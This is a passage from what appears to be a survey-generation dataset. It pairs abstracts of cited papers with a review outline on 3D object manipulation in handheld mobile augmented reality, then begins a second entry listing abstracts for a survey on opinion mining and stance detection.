performance metrics of the proposed method on an AR object manipulation task. The Rod method achieved the highest success rate (91%). Participants' feedback indicated that this is because the Rod method is the most natural, and evoked a fixed mental model that is conceivable in the real environment. These results indicated that visualizing the manipulation point on the screen and restricting the user's interactivity with virtual objects from the user's position of view based on a conceivable mental model would be able to aid the user to achieve precise manipulation. --- paper_title: The design and evaluation of 3D positioning techniques for multi-touch displays paper_content: Multi-touch displays represent a promising technology for the display and manipulation of 3D data. To fully exploit their capabilities, appropriate interaction techniques must be designed. In this paper, we explore the design of free 3D positioning techniques for multi-touch displays to exploit the additional degrees of freedom provided by this technology. Our contribution is two-fold: first we present an interaction technique to extend the standard four view-ports technique found in commercial CAD applications, and second we introduce a technique designed to allow free 3D positioning with a single view of the scene. The two techniques were evaluated in a preliminary experiment. The first results incline us to conclude that the two techniques are equivalent in term of performance showing that the Z-technique provides a real alternative to the statu quo viewport technique. --- paper_title: A screen-space formulation for 2D and 3D direct manipulation paper_content: Rotate-Scale-Translate (RST) interactions have become the de facto standard when interacting with two-dimensional (2D) contexts in single-touch and multi-touch environments. Because the use of RST has thus far focused almost entirely on 2D, there are not yet standard techniques for extending these principles into three dimensions. In this paper we describe a screen-space method which fully captures the semantics of the traditional 2D RST multi-touch interaction, but also allows us to extend these same principles into three-dimensional (3D) interaction. Just like RST allows users to directly manipulate 2D contexts with two or more points, our method allows the user to directly manipulate 3D objects with three or more points. We show some novel interactions, which take perspective into account and are thus not available in orthographic environments. Furthermore, we identify key ambiguities and unexpected behaviors that arise when performing direct manipulation in 3D and offer solutions to mitigate the difficulties each presents. Finally, we show how to extend our method to meet application-specific control objectives, as well as show our method working in some example environments. --- paper_title: Consumed endurance: a metric to quantify arm fatigue of mid-air interactions paper_content: Mid-air interactions are prone to fatigue and lead to a feeling of heaviness in the upper limbs, a condition casually termed as the gorilla-arm effect. Designers have often associated limitations of their mid-air interactions with arm fatigue, but do not possess a quantitative method to assess and therefore mitigate it. In this paper we propose a novel metric, Consumed Endurance (CE), derived from the biomechanical structure of the upper arm and aimed at characterizing the gorilla-arm effect. We present a method to capture CE in a non-intrusive manner using an off-the-shelf camera-based skeleton tracking system, and demonstrate that CE correlates strongly with the Borg CR10 scale of perceived exertion. We show how designers can use CE as a complementary metric for evaluating existing and designing novel mid-air interactions, including tasks with repetitive input such as mid-air text-entry. Finally, we propose a series of guidelines for the design of fatigue-efficient mid-air interfaces. --- paper_title: Freeze view touch and finger gesture based interaction methods for handheld augmented reality interfaces paper_content: Interaction techniques for handheld mobile Augmented Reality (AR) often focus on device-centric methods based around touch input. However, users may not be able to easily interact with virtual objects in mobile AR scenes if they are holding the handheld device with one hand and touching the screen with the other, while at the same time trying to maintain visual tracking of an AR marker. In this paper we explore novel interaction methods for handheld mobile AR that overcomes this problem. We investigate two different approaches; (1) freeze view touch and (2) finger gesture based interaction. We describe how each method is implemented and present findings from a user experiment comparing virtual object manipulation with these techniques to more traditional touch methods. --- paper_title: 3D Finger CAPE: Clicking Action and Position Estimation under Self-Occlusions in Egocentric Viewpoint paper_content: In this paper we present a novel framework for simultaneous detection of click action and estimation of occluded fingertip positions from egocentric viewed single-depth image sequences. For the detection and estimation, a novel probabilistic inference based on knowledge priors of clicking motion and clicked position is presented. Based on the detection and estimation results, we were able to achieve a fine resolution level of a bare hand-based interaction with virtual objects in egocentric viewpoint. Our contributions include: (i) a rotation and translation invariant finger clicking action and position estimation using the combination of 2D image-based fingertip detection with 3D hand posture estimation in egocentric viewpoint. (ii) a novel spatio-temporal random forest, which performs the detection and estimation efficiently in a single framework. We also present (iii) a selection process utilizing the proposed clicking action detection and position estimation in an arm reachable AR/VR space, which does not require any additional device. Experimental results show that the proposed method delivers promising performance under frequent self-occlusions in the process of selecting objects in AR/VR space whilst wearing an egocentric-depth camera-attached HMD. --- paper_title: Mobile Augmented Reality Survey: From Where We Are to Where We Go paper_content: The boom in the capabilities and features of mobile devices, like smartphones, tablets, and wearables, combined with the ubiquitous and affordable Internet access and the advances in the areas of cooperative networking, computer vision, and mobile cloud computing transformed mobile augmented reality (MAR) from science fiction to a reality. Although mobile devices are more constrained computationalwise from traditional computers, they have a multitude of sensors that can be used to the development of more sophisticated MAR applications and can be assisted from remote servers for the execution of their intensive parts. In this paper, after introducing the reader to the basics of MAR, we present a categorization of the application fields together with some representative examples. Next, we introduce the reader to the user interface and experience in MAR applications and continue with the core system components of the MAR systems. After that, we discuss advances in tracking and registration, since their functionality is crucial to any MAR application and the network connectivity of the devices that run MAR applications together with its importance to the performance of the application. We continue with the importance of data management in MAR systems and the systems performance and sustainability, and before we conclude this survey, we present existing challenging problems. --- paper_title: Trends in augmented reality tracking, interaction and display: A review of ten years of ISMAR paper_content: Although Augmented Reality technology was first developed over forty years ago, there has been little survey work giving an overview of recent research in the field. This paper reviews the ten-year development of the work presented at the ISMAR conference and its predecessors with a particular focus on tracking, interaction and display research. It provides a roadmap for future augmented reality research which will be of great value to this relatively young field, and also for helping researchers decide which topics should be explored when they are beginning their own studies in the area. --- paper_title: A Review on Industrial Augmented Reality Systems for the Industry 4.0 Shipyard paper_content: Shipbuilding companies are upgrading their inner workings in order to create Shipyards 4.0, where the principles of Industry 4.0 are paving the way to further digitalized and optimized processes in an integrated network. Among the different Industry 4.0 technologies, this paper focuses on augmented reality, whose application in the industrial field has led to the concept of industrial augmented reality (IAR). This paper first describes the basics of IAR and then carries out a thorough analysis of the latest IAR systems for industrial and shipbuilding applications. Then, in order to build a practical IAR system for shipyard workers, the main hardware and software solutions are compared. Finally, as a conclusion after reviewing all the aspects related to IAR for shipbuilding, it proposed an IAR system architecture that combines cloudlets and fog computing, which reduce latency response and accelerate rendering tasks while offloading compute intensive tasks from the cloud. --- paper_title: Haptic augmented reality interface using the real force response of an object paper_content: This paper presents the haptic interface system that consists of a base object and a haptic device. The desired force response is achieved by the combination of the real force response of the base object and the virtual force exerted by the haptic device. The proposed haptic augmented reality (AR) system can easily generate the force response of a visco-elastic object with a cheap haptic device and a base object that has the similar visco-elastic property to the target object. In the demonstration, the force response of the target object was generated by using a haptic device only (VR) and using both a haptic device and a base object (AR), respectively. The evaluation experiments by participants show that the AR method has better performance than the VR method. This result indicates the potential of the proposed haptic AR interface. --- paper_title: Expected user experience of mobile augmented reality services: a user study in the context of shopping centres paper_content: The technical enablers for mobile augmented reality (MAR) are becoming robust enough to allow the development of MAR services that are truly valuable for consumers. Such services would provide a novel interface to the ubiquitous digital information in the physical world, hence serving in great variety of contexts and everyday human activities. To ensure the acceptance and success of future MAR services, their development should be based on knowledge about potential end users' expectations and requirements. We conducted 16 semi-structured interview sessions with 28 participants in shopping centres, which can be considered as a fruitful context for MAR services. We aimed to elicit new knowledge about (1) the characteristics of the expected user experience and (2) central user requirements related to MAR in such a context. From a pragmatic viewpoint, the participants expected MAR services to catalyse their sense of efficiency, empower them with novel context-sensitive and proactive functionalities and raise their awareness of the information related to their surroundings with an intuitive interface. Emotionally, MAR services were expected to offer stimulating and pleasant experiences, such as playfulness, inspiration, liveliness, collectivity and surprise. The user experience categories and user requirements that were identified can serve as targets for the design of user experience of future MAR services. --- paper_title: Simulating Haptic Feedback Using Vision: A Survey of Research and Applications of Pseudo-Haptic Feedback paper_content: This paper presents a survey of the main results obtained in the field of “pseudo-haptic feedback”: a technique meant to simulate haptic sensations in virtual environments using visual feedback and properties of human visuo-haptic perception. Pseudo-haptic feedback uses vision to distort haptic perception and verges on haptic illusions. Pseudo-haptic feedback has been used to simulate various haptic properties such as the stiffness of a virtual spring, the texture of an image, or the mass of a virtual object. This paper describes the several experiments in which these haptic properties were simulated. It assesses the definition and the properties of pseudo-haptic feedback. It also describes several virtual reality applications in which pseudo-haptic feedback has been successfully implemented, such as a virtual environment for vocational training of milling machine operations, or a medical simulator for training in regional anesthesia procedures. --- paper_title: Current issues in handheld augmented reality paper_content: Equipped with powerful processors, cameras for capturing still images and video, and a range of sensors capable of tracking location, orientation and motion of the user, modern smartphones offer a sophisticated platform for implementing handheld augmented reality (AR) applications. Despite the advances in research and development, implementing AR applications for the smartphone platform remains a challenge due to many open problems related to navigation, contextawareness, visualization, usability and interaction design, as well as content creation and sharing. This paper surveys a number of open challenges and issues, trade-offs and possible solutions in implementing handheld AR applications. --- paper_title: Integrated view-input ar interaction for virtual object manipulation using tablets and smartphones paper_content: Lately, mobile augmented reality (AR) has become very popular and is used for many commercial and product promotional activities. However, in almost all mobile AR applications, the user only views annotated information or the preset motion of the virtual object in an AR environment and is unable to interact with the virtual objects as if he/she were interacting with real objects in the real environment. In this paper, in an attempt to realize enhanced intuitive and realistic object manipulation in the mobile AR environment, we propose an integrated view-input AR interaction method, which integrates user device manipulation and virtual object manipulation. The method enables the user to hold a 3D virtual object by touching the displayed object on the 2D touch screen of a mobile device, and to move and rotate the object by moving and rotating the mobile device while viewing the held object by way of the 2D screen of the mobile device. Based on this concept, we implemented three types of integrated methods, namely the Rod, Center, and Touch methods, and conducted a user study to investigate the baseline performance metrics of the proposed method on an AR object manipulation task. The Rod method achieved the highest success rate (91%). Participants' feedback indicated that this is because the Rod method is the most natural, and evoked a fixed mental model that is conceivable in the real environment. These results indicated that visualizing the manipulation point on the screen and restricting the user's interactivity with virtual objects from the user's position of view based on a conceivable mental model would be able to aid the user to achieve precise manipulation. ---
Title: 3D Object Manipulation Techniques in Handheld Mobile Augmented Reality Interface: A Review Section 1: INTRODUCTION Description 1: Write an introduction that defines augmented reality (AR) using various references, explains its importance, and highlights the focus of the survey. Section 2: MOTIVATION Description 2: Discuss the motivation behind studying 3D object manipulation techniques in handheld mobile AR, highlighting the lack of comprehensive overviews on the topic. Section 3: HANDHELD MOBILE AR INTERFACE Description 3: Describe the significance of handheld mobile AR interfaces, differences from traditional desktop/tabletop AR interfaces, and focus on three major interaction parts: tangible user interaction, multimodal input, and mobile interaction. Section 4: TOUCH-BASED INTERACTION Description 4: Present touch-based interaction techniques for 3D object manipulation in handheld mobile AR, including the challenges and solutions proposed by various studies. Section 5: 3D OBJECT MANIPULATION FOR HANDHELD MOBILE DISPLAYS Description 5: Explain how touch-based interaction techniques have been adapted for small touch-based displays such as smartphones and discuss their effectiveness in 3D object manipulation. Section 6: MID-AIR GESTURES-BASED INTERACTION Description 6: Detail mid-air gestures-based interaction techniques for 3D object manipulation in handheld mobile AR, including the historical development and recent advancements in the field. Section 7: 3D OBJECT MANIPULATION FOR HANDHELD MOBILE AR Description 7: Discuss how mid-air gestures-based interaction techniques have been applied and evaluated in handheld mobile AR environments, and compare them with other interaction techniques. Section 8: DEVICE-BASED INTERACTION Description 8: Describe device-based interaction techniques where the device itself is used for 3D object manipulation, and present examples of early implementations and recent advancements. Section 9: REMAINING ISSUES IN 3D OBJECT MANIPULATION WITHIN HANDHELD MOBILE AR Description 9: Highlight the primary remaining issues in 3D object manipulation within handheld mobile AR, including occlusion, fatigue, position mismatch, and the need for prior knowledge. Section 10: CONCLUSION AND FUTURE DIRECTIONS Description 10: Conclude the survey by summarizing key findings and discussing potential future research directions in 3D object manipulation techniques for handheld mobile AR.
A Survey on Opinion Mining: From Stance to Product Aspect
6
--- paper_title: Review-based measurement of customer satisfaction in mobile service: Sentiment analysis and VIKOR approach paper_content: With the rapid growth and dissemination of mobile services, enhancement of customer satisfaction has emerged as a core issue. Customer reviews are recognized as fruitful information sources for monitoring and enhancing customer satisfaction levels, particularly as they convey the real voices of actual customers expressing relatively unambiguous opinions. As a methodological means of customer review analysis, sentiment analysis has come to the fore. Although several sentiment analysis approaches have proposed extraction of the emotional information from customer reviews, however, a lacuna remains as to how to effectively analyze customer reviews for the purpose of monitoring customer satisfaction with mobile services. In response, the present study developed a new framework for measurement of customer satisfaction for mobile services by combining VIKOR (in Serbian: ViseKriterijumsa Optimizacija I Kompromisno Resenje) and sentiment analysis. With VIKOR, which is a compromise ranking method of the multicriteria decision making (MCDM) approach, customer satisfaction for mobile services can be accurately measured by a sentiment-analysis scheme that simultaneously considers maximum group utility and individual regret. The suggested framework consists mainly of two stages: data collection and preprocessing, and measurement of customer satisfaction. In the first, data collection and preprocessing stage, text mining is utilized to compile customer-review-based dictionaries of attributes and sentiment words. Then, using sentiment analysis, sentiment scores for attributes are calculated for each mobile service. In the second stage, levels of customer satisfaction are measured using VIKOR. For the purpose of illustration, an empirical case study was conducted on customer reviews of mobile application services. We believe that the proposed customer-review-based approach not only saves time and effort in measuring customer satisfaction, but also captures the real voices of customers. --- paper_title: Extra-Linguistic Constraints on Stance Recognition in Ideological Debates paper_content: Determining the stance expressed by an author from a post written for a twosided debate in an online debate forum is a relatively new problem. We seek to improve Anand et al.’s (2011) approach to debate stance classification by modeling two types of soft extra-linguistic constraints on the stance labels of debate posts, user-interaction constraints and ideology constraints. Experimental results on four datasets demonstrate the effectiveness of these inter-post constraints in improving debate stance classification. --- paper_title: Weakly-Guided User Stance Prediction via Joint Modeling of Content and Social Interaction paper_content: Social media websites have become a popular outlet for online users to express their opinions on controversial issues, such as gun control and abortion. Understanding users' stances and their arguments is a critical task for policy-making process and public deliberation. Existing methods rely on large amounts of human annotation for predicting stance on issues of interest, which is expensive and hard to scale to new problems. In this work, we present a weakly-guided user stance modeling framework which simultaneously considers two types of information: what do you say (via stance-based content generative model) and how do you behave (via social interaction-based graph regularization). We experiment with two types of social media data: news comments and discussion forum posts. Our model uniformly outperforms a logistic regression-based supervised method on stance-based link prediction for unseen users on news comments. Our method also achieves better or comparable stance prediction performance for discussion forum users, when compared with state-of-the-art supervised systems. Meanwhile, separate word distributions are learned for users of opposite stances. This potentially helps with better understanding and interpretation of conflicting arguments for controversial issues. --- paper_title: Mining frequent patterns without candidate generation paper_content: Mining frequent patterns in transaction databases, time-series databases, and many other kinds of databases has been studied popularly in data mining research. Most of the previous studies adopt an Apriori-like candidate set generation-and-test approach. However, candidate set generation is still costly, especially when there exist prolific patterns and/or long patterns. ::: In this study, we propose a novel frequent pattern tree (FP-tree) structure, which is an extended prefix-tree structure for storing compressed, crucial information about frequent patterns, and develop an efficient FP-tree-based mining method, FP-growth, for mining the complete set of frequent patterns by pattern fragment growth. Efficiency of mining is achieved with three techniques: (1) a large database is compressed into a highly condensed, much smaller data structure, which avoids costly, repeated database scans, (2) our FP-tree-based mining adopts a pattern fragment growth method to avoid the costly generation of a large number of candidate sets, and (3) a partitioning-based, divide-and-conquer method is used to decompose the mining task into a set of smaller tasks for mining confined patterns in conditional databases, which dramatically reduces the search space. Our performance study shows that the FP-growth method is efficient and scalable for mining both long and short frequent patterns, and is about an order of magnitude faster than the Apriori algorithm and also faster than some recently reported new frequent pattern mining methods. --- paper_title: Support or Oppose? Classifying Positions in Online Debates from Reply Activities and Opinion Expressions paper_content: We propose a method for the task of identifying the general positions of users in online debates, i.e., support or oppose the main topic of an online debate, by exploiting local information in their remarks within the debate. An online debate is a forum where each user post an opinion on a particular topic while other users state their positions by posting their remarks within the debate. The supporting or opposing remarks are made by directly replying to the opinion, or indirectly to other remarks (to express local agreement or disagreement), which makes the task of identifying users' general positions difficult. A prior study has shown that a link-based method, which completely ignores the content of the remarks, can achieve higher accuracy for the identification task than methods based solely on the contents of the remarks. In this paper, we show that utilizing the textual content of the remarks into the link-based method can yield higher accuracy in the identification task. --- paper_title: Cross-Target Stance Classification with Self-Attention Networks paper_content: In stance classification, the target on which the stance is made defines the boundary of the task, and a classifier is usually trained for prediction on the same target. In this work, we explore the potential for generalizing classifiers between different targets, and propose a neural model that can apply what has been learned from a source target to a destination target. We show that our model can find useful information shared between relevant targets which improves generalization in certain scenarios. --- paper_title: Opinion mining and sentiment analysis paper_content: An important part of our information-gathering behavior has always been to find out what other people think. With the growing availability and popularity of opinion-rich resources such as online review sites and personal blogs, new opportunities and challenges arise as people now can, and do, actively use information technologies to seek out and understand the opinions of others. The sudden eruption of activity in the area of opinion mining and sentiment analysis, which deals with the computational treatment of opinion, sentiment, and subjectivity in text, has thus occurred at least in part as a direct response to the surge of interest in new systems that deal directly with opinions as a first-class object. ::: ::: This survey covers techniques and approaches that promise to directly enable opinion-oriented information-seeking systems. Our focus is on methods that seek to address the new challenges raised by sentiment-aware applications, as compared to those that are already present in more traditional fact-based analysis. We include material on summarization of evaluative text and on broader issues regarding privacy, manipulation, and economic impact that the development of opinion-oriented information-access services gives rise to. To facilitate future work, a discussion of available resources, benchmark datasets, and evaluation campaigns is also provided. --- paper_title: Recurrent neural network based language model paper_content: A new recurrent neural network based language model (RNN LM) with applications to speech recognition is presented. Results indicate that it is possible to obtain around 50% reduction of perplexity by using mixture of several RNN LMs, compared to a state of the art backoff language model. Speech recognition experiments show around 18% reduction of word error rate on the Wall Street Journal task when comparing models trained on the same amount of data, and around 5% on the much harder NIST RT05 task, even when the backoff model is trained on much more data than the RNN LM. We provide ample empirical evidence to suggest that connectionist language models are superior to standard n-gram techniques, except their high computational (training) complexity. Index Terms: language modeling, recurrent neural networks, speech recognition --- paper_title: Get Out The Vote: Determining Support Or Opposition From Congressional Floor-Debate Transcripts paper_content: We investigate whether one can determine from the transcripts of U.S. Congressional floor debates whether the speeches represent support of or opposition to proposed legislation. To address this problem, we exploit the fact that these speeches occur as part of a discussion; this allows us to use sources of information regarding relationships between discourse segments, such as whether a given utterance indicates agreement with the opinion expressed by another. We find that the incorporation of such information yields substantial improvements over classifying speeches in isolation. --- paper_title: Mining newsgroups using networks arising from social behavior paper_content: Recent advances in information retrieval over hyperlinked corpora have convincingly demonstrated that links carry less noisy information than text. We investigate the feasibility of applying link-based methods in new applications domains. The specific application we consider is to partition authors into opposite camps within a given topic in the context of newsgroups. A typical newsgroup posting consists of one or more quoted lines from another posting followed by the opinion of the author. This social behavior gives rise to a network in which the vertices are individuals and the links represent "responded-to" relationships. An interesting characteristic of many newsgroups is that people more frequently respond to a message when they disagree than when they agree. This behavior is in sharp contrast to the WWW link graph, where linkage is an indicator of agreement or common interest. By analyzing the graph structure of the responses, we are able to effectively classify people into opposite camps. In contrast, methods based on statistical analysis of text yield low accuracy on such datasets because the vocabulary used by the two sides tends to be largely identical, and many newsgroup postings consist of relatively few words of text. --- paper_title: OpinionMiner: a novel machine learning system for web opinion mining and extraction paper_content: Merchants selling products on the Web often ask their customers to share their opinions and hands-on experiences on products they have purchased. Unfortunately, reading through all customer reviews is difficult, especially for popular items, the number of reviews can be up to hundreds or even thousands. This makes it difficult for a potential customer to read them to make an informed decision. The OpinionMiner system designed in this work aims to mine customer reviews of a product and extract high detailed product entities on which reviewers express their opinions. Opinion expressions are identified and opinion orientations for each recognized product entity are classified as positive or negative. Different from previous approaches that employed rule-based or statistical techniques, we propose a novel machine learning approach built under the framework of lexicalized HMMs. The approach naturally integrates multiple important linguistic features into automatic learning. In this paper, we describe the architecture and main components of the system. The evaluation of the proposed method is presented based on processing the online product reviews from Amazon and other publicly available datasets. --- paper_title: A Convolutional Neural Network for Modelling Sentences paper_content: The ability to accurately represent sentences is central to language understanding. We describe a convolutional architecture dubbed the Dynamic Convolutional Neural Network (DCNN) that we adopt for the semantic modelling of sentences. The network uses Dynamic k-Max Pooling, a global pooling operation over linear sequences. The network handles input sentences of varying length and induces a feature graph over the sentence that is capable of explicitly capturing short and long-range relations. The network does not rely on a parse tree and is easily applicable to any language. We test the DCNN in four experiments: small scale binary and multi-class sentiment prediction, six-way question classification and Twitter sentiment prediction by distant supervision. The network achieves excellent performance in the first three tasks and a greater than 25% error reduction in the last task with respect to the strongest baseline. --- paper_title: Mining and summarizing customer reviews paper_content: Merchants selling products on the Web often ask their customers to review the products that they have purchased and the associated services. As e-commerce is becoming more and more popular, the number of customer reviews that a product receives grows rapidly. For a popular product, the number of reviews can be in hundreds or even thousands. This makes it difficult for a potential customer to read them to make an informed decision on whether to purchase the product. It also makes it difficult for the manufacturer of the product to keep track and to manage customer opinions. For the manufacturer, there are additional difficulties because many merchant sites may sell the same product and the manufacturer normally produces many kinds of products. In this research, we aim to mine and to summarize all the customer reviews of a product. This summarization task is different from traditional text summarization because we only mine the features of the product on which the customers have expressed their opinions and whether the opinions are positive or negative. We do not summarize the reviews by selecting a subset or rewrite some of the original sentences from the reviews to capture the main points as in the classic text summarization. Our task is performed in three steps: (1) mining product features that have been commented on by customers; (2) identifying opinion sentences in each review and deciding whether each opinion sentence is positive or negative; (3) summarizing the results. This paper proposes several novel techniques to perform these tasks. Our experimental results using reviews of a number of products sold online demonstrate the effectiveness of the techniques. --- paper_title: Aspect Term Extraction with History Attention and Selective Transformation paper_content: Aspect Term Extraction (ATE), a key sub-task in Aspect-Based Sentiment Analysis, aims to extract explicit aspect expressions from online user reviews. We present a new framework for tackling ATE. It can exploit two useful clues, namely opinion summary and aspect detection history. Opinion summary is distilled from the whole input sentence, conditioned on each current token for aspect prediction, and thus the tailor-made summary can help aspect prediction on this token. Another clue is the information of aspect detection history, and it is distilled from the previous aspect predictions so as to leverage the coordinate structure and tagging schema constraints to upgrade the aspect prediction. Experimental results over four benchmark datasets clearly demonstrate that our framework can outperform all state-of-the-art methods. --- paper_title: The Power of Negative Thinking: Exploiting Label Disagreement in the Min-cut Classification Framework paper_content: Treating classification as seeking minimum cuts in the appropriate graph has proven effective in a number of applications. The power of this approach lies in its ability to incorporate label-agreement preferences among pairs of instances in a provably tractable way. Label disagreement preferences are another potentially rich source of information, but prior NLP work within the minimum-cut paradigm has not explicitly incorporated it. Here, we report on work in progress that examines several novel heuristics for incorporating such information. Our results, produced within the context of a politically-oriented sentiment-classification task, demonstrate that these heuristics allow for the addition of label-disagreement information in a way that improves classification accuracy while preserving the efficiency guarantees of the minimum-cut framework. --- paper_title: A survey on sentiment detection of reviews paper_content: The sentiment detection of texts has been witnessed a booming interest in recent years, due to the increased availability of online reviews in digital form and the ensuing need to organize them. Till to now, there are mainly four different problems predominating in this research community, namely, subjectivity classification, word sentiment classification, document sentiment classification and opinion extraction. In fact, there are inherent relations between them. Subjectivity classification can prevent the sentiment classifier from considering irrelevant or even potentially misleading text. Document sentiment classification and opinion extraction have often involved word sentiment classification techniques. This survey discusses related issues and main approaches to these problems. --- paper_title: Aspect-based opinion mining from product reviews paper_content: "What other people think" has always been an important piece of information for most of us during the decision-making process. Today people tend to make their opinions available to other people via the Internet. As a result, the Web has become an excellent source of consumer opinions. There are now numerous Web resources containing such opinions, e.g., product reviews forums, discussion groups, and blogs. But, it is really difficult for a customer to read all of the reviews and make an informed decision on whether to purchase the product. It is also difficult for the manufacturer of the product to keep track and manage customer opinions. Also, focusing on just user ratings (stars) is not a sufficient source of information for a user or the manufacturer to make decisions. Therefore, mining online reviews (opinion mining) has emerged as an interesting new research direction. Extracting aspects and the corresponding ratings is an important challenge in opinion mining. An aspect is an attribute or component of a product, e.g. 'zoom' for a digital camera. A rating is an intended interpretation of the user satisfaction in terms of numerical values. Reviewers usually express the rating of an aspect by a set of sentiments, e.g. 'great zoom'. In this tutorial we cover opinion mining in online product reviews with the focus on aspect-based opinion mining. This problem is a key task in the area of opinion mining and has attracted a lot of researchers in the information retrieval community recently. Several opinion related information retrieval tasks can benefit from the results of aspect-based opinion mining and therefore it is considered as a fundamental problem. This tutorial covers not only general opinion mining and retrieval tasks, but also state-of-the-art methods, challenges, applications, and also future research directions of aspect-based opinion mining. --- paper_title: Sentiment analysis algorithms and applications: A survey paper_content: Abstract Sentiment Analysis (SA) is an ongoing field of research in text mining field. SA is the computational treatment of opinions, sentiments and subjectivity of text. This survey paper tackles a comprehensive overview of the last update in this field. Many recently proposed algorithms' enhancements and various SA applications are investigated and presented briefly in this survey. These articles are categorized according to their contributions in the various SA techniques. The related fields to SA (transfer learning, emotion detection, and building resources) that attracted researchers recently are discussed. The main target of this survey is to give nearly full image of SA techniques and the related fields with brief details. The main contributions of this paper include the sophisticated categorizations of a large number of recent articles and the illustration of the recent trend of research in the sentiment analysis and its related areas. --- paper_title: Extracting Opinion Expressions with semi-Markov Conditional Random Fields paper_content: Extracting opinion expressions from text is usually formulated as a token-level sequence labeling task tackled using Conditional Random Fields (CRFs). CRFs, however, do not readily model potentially useful segment-level information like syntactic constituent structure. Thus, we propose a semi-CRF-based approach to the task that can perform sequence labeling at the segment level. We extend the original semi-CRF model (Sarawagi and Cohen, 2004) to allow the modeling of arbitrarily long expressions while accounting for their likely syntactic structure when modeling segment boundaries. We evaluate performance on two opinion extraction tasks, and, in contrast to previous sequence labeling approaches to the task, explore the usefulness of segmentlevel syntactic parse features. Experimental results demonstrate that our approach outperforms state-of-the-art methods for both opinion expression tasks. --- paper_title: Long Short-Term Memory paper_content: Learning to store information over extended time intervals by recurrent backpropagation takes a very long time, mostly because of insufficient, decaying error backflow. We briefly review Hochreiter's (1991) analysis of this problem, then address it by introducing a novel, efficient, gradient based method called long short-term memory (LSTM). Truncating the gradient where this does not do harm, LSTM can learn to bridge minimal time lags in excess of 1000 discrete-time steps by enforcing constant error flow through constant error carousels within special units. Multiplicative gate units learn to open and close access to the constant error flow. LSTM is local in space and time; its computational complexity per time step and weight is O. 1. Our experiments with artificial data involve local, distributed, real-valued, and noisy pattern representations. In comparisons with real-time recurrent learning, back propagation through time, recurrent cascade correlation, Elman nets, and neural sequence chunking, LSTM leads to many more successful runs, and learns much faster. LSTM also solves complex, artificial long-time-lag tasks that have never been solved by previous recurrent network algorithms. --- paper_title: Linguistic attention-based model for aspect extraction paper_content: Aspect extraction plays an important role in aspect-level sentiment analysis. Most existing approaches focus on explicit aspect extraction and either seriously rely on syntactic rules or only make use of neural network without linguistic knowledge. This paper proposes a linguistic attention-based model (LABM) to implement explicit and implicit aspect extraction together. The linguistic attention mechanism incorporates the knowledge of linguistics which has proven to be very useful in aspect extraction. We also propose a novel unsupervised training approach, distributed aspect learning (DAL), the core idea of DAL is that the aspect vector should align closely to the neural word embeddings of nouns which are tightly associated with the valid aspect indicators. Experimental results using six datasets demonstrate that our model is explainable and outperforms baseline models on evaluation tasks. --- paper_title: Cats Rule and Dogs Drool!: Classifying Stance in Online Debate paper_content: A growing body of work has highlighted the challenges of identifying the stance a speaker holds towards a particular topic, a task that involves identifying a holistic subjective disposition. We examine stance classification on a corpus of 4873 posts across 14 topics on ConvinceMe.net, ranging from the playful to the ideological. We show that ideological debates feature a greater share of rebuttal posts, and that rebuttal posts are significantly harder to classify for stance, for both humans and trained classifiers. We also demonstrate that the number of subjective expressions varies across debates, a fact correlated with the performance of systems sensitive to sentiment-bearing terms. We present results for identifing rebuttals with 63% accuracy, and for identifying stance on a per topic basis that range from 54% to 69%, as compared to unigram baselines that vary between 49% and 60%. Our results suggest that methods that take into account the dialogic context of such posts might be fruitful. --- paper_title: Opinion Mining with Deep Recurrent Neural Networks paper_content: Recurrent neural networks (RNNs) are connectionist models of sequential data that are naturally applicable to the analysis of natural language. Recently, “depth in space” — as an orthogonal notion to “depth in time” — in RNNs has been investigated by stacking multiple layers of RNNs and shown empirically to bring a temporal hierarchy to the architecture. In this work we apply these deep RNNs to the task of opinion expression extraction formulated as a token-level sequence-labeling task. Experimental results show that deep, narrow RNNs outperform traditional shallow, wide RNNs with the same number of parameters. Furthermore, our approach outperforms previous CRF-based baselines, including the state-of-the-art semi-Markov CRF model, and does so without access to the powerful opinion lexicons and syntactic features relied upon by the semi-CRF, as well as without the standard layer-by-layer pre-training typically required of RNN architectures. --- paper_title: Exploring Various Linguistic Features for Stance Detection paper_content: In this paper, we describe our participation in the fourth shared task (NLPCC-ICCPOL 2016 Shared Task 4) on the stance detection in Chinese Micro-blogs (subtask A). Different from ordinary features, we explore four linguistic features including lexical features, morphology features, semantic features and syntax features in Chinese micro-blogs in stance classifier, and get a good performance, which ranks the third place among sixteen systems. --- paper_title: Semantic sentiment analysis of twitter paper_content: Sentiment analysis over Twitter offer organisations a fast and effective way to monitor the publics' feelings towards their brand, business, directors, etc. A wide range of features and methods for training sentiment classifiers for Twitter datasets have been researched in recent years with varying results. In this paper, we introduce a novel approach of adding semantics as additional features into the training set for sentiment analysis. For each extracted entity (e.g. iPhone) from tweets, we add its semantic concept (e.g. "Apple product") as an additional feature, and measure the correlation of the representative concept with negative/positive sentiment. We apply this approach to predict sentiment for three different Twitter datasets. Our results show an average increase of F harmonic accuracy score for identifying both negative and positive sentiment of around 6.5% and 4.8% over the baselines of unigrams and part-of-speech features respectively. We also compare against an approach based on sentiment-bearing topic analysis, and find that semantic features produce better Recall and F score when classifying negative sentiment, and better Precision with lower Recall and F score in positive sentiment classification. --- paper_title: Whose and what chatter matters? The effect of tweets on movie sales paper_content: Social broadcasting networks such as Twitter in the U.S. and ''Weibo'' in China are transforming the way online word of mouth (WOM) is disseminated and consumed in the digital age. In the present study, we investigated whether and how Twitter WOM affects movie sales by estimating a dynamic panel data model using publicly available data and well-known machine learning algorithms. We found that chatter on Twitter does matter; however, the magnitude and direction of the effect depend on whom the WOM is from and what the WOM is about. Incorporating the number of followers the author of each WOM message had into our study, we found that the effect of WOM from users followed by more Twitter users is significantly larger than those followed by less Twitter users. In support of some recent findings about the importance of WOM valence on product sales, we also found that positive Twitter WOM is associated with higher movie sales, whereas negative WOM is associated with lower movie sales. Interestingly, we found that the strongest effect on movie sales comes from those tweets in which the authors expressed their intention to watch a certain movie. We attribute this finding to the dual effects of such intention tweets on movie sales: the direct effect through the WOM author's own purchase behavior, and the indirect effect through either the awareness effect or the persuasive effect of the WOM on its recipients. Our findings provide new perspectives to understand the effect of WOM on product sales and have important managerial implications. For example, our study reveals the potential values of monitoring people's intentions and sentiments on Twitter and identifying influential users for companies wishing to harness the power of social broadcasting networks. --- paper_title: Efficient Estimation of Word Representations in Vector Space paper_content: We propose two novel model architectures for computing continuous vector representations of words from very large data sets. The quality of these representations is measured in a word similarity task, and the results are compared to the previously best performing techniques based on different types of neural networks. We observe large improvements in accuracy at much lower computational cost, i.e. it takes less than a day to learn high quality word vectors from a 1.6 billion words data set. 